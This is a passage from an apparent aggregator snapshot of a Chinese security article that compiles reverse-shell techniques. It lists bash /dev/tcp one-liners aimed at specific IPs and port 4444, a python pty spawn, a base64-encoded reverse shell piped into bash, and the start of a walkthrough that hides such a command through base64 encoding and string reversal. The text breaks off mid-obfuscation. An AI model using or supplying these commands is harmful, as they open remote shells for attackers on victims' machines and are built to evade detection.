看啥推荐读物
专栏名称: 亿人安全
知其黑,守其白。手握利剑,心系安全。主要研究方向包括:Web、内网、红蓝对抗、代码审计、安卓逆向、工控、ctf系列。
今天看啥  ›  专栏  ›  亿人安全

攻防|反弹shell方式汇总

亿人安全  · 公众号  ·  · 2024-04-17 09:30
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦原文链接:https://xz.aliyun.com/t/14240文章旨意在于总结各类反弹shell,有不足或漏缺请各位是否指出.注意有些反弹shell的方法或脚本只适用于Linux或者Windows,注意区分相关脚本的编写方式方法。bashbash -i >& /dev/[tcp|udp]/[host]/[port] 0>&1/bin/bash -i > /dev/[tcp/udp]/[host]/[port] 0&1 2>&1python3 -c 'import pty;pty.spawn("/bin/bash")' stty rawbase64版bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}' //其中的base64字符是bash -i >& /dev/tcp/10.10.14.7/4444 0>&1的base64加密还可以引申一波基础的反弹指令echo "bash -i >& /dev/tcp/192.168.43.47/4444 0>&1" | bash我们来给它混淆一下先给它base64一下ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjQ3LzQ0NDQgMD4mMSIgfCBiYXNo然后反转一下oNXYiBCfgISMm4D ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照